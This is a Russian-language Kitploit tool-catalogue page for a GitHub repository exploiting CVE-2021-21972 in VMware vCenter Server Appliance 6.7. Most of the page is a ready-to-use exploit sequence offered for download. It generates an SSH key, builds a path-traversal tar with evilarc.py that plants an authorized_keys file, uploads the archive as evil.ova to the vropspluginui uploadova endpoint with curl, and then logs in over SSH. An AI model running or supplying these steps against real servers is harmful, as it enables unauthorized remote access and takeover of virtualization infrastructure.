Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/renini/cve-2021-21972
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеИнструмент Удаленного Доступа
GitHubrenini/cve-2021-21972

CVE-2021-21972

CVE-2021-21972

Репозиторий
25 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2021-21972

CVE-2021-21972

Протестировано на VMware VCSA 6.7

Создать ssh-ключевую пару

root@kitploit:~
ssh-keygen -t rsa -f vcsa.key -N ''

Создать tarbal с ../../../../../home/vsphere-ui/.ssh/authorized_keys

root@kitploit:~
python2 evilarc.py -d 5 -p 'home/vsphere-ui/.ssh' -o unix -f evil.tar authorized_keys
mv evil.tar evil.ova

Загрузить evil.ova в REST endpoint uploadova vropspluginui

root@kitploit:~
curl -k -A "" --form "[email protected];type=text/plain" https://$VCSA_IP/ui/vropspluginui/rest/services/uploadova -H "Accept: application/json"

Подключиться по SSH к VCSA с добавленным авторизованным ключом

root@kitploit:~
ssh -i vcsa.key vsphere-ui@$VCSA_IP
Скачать инструмент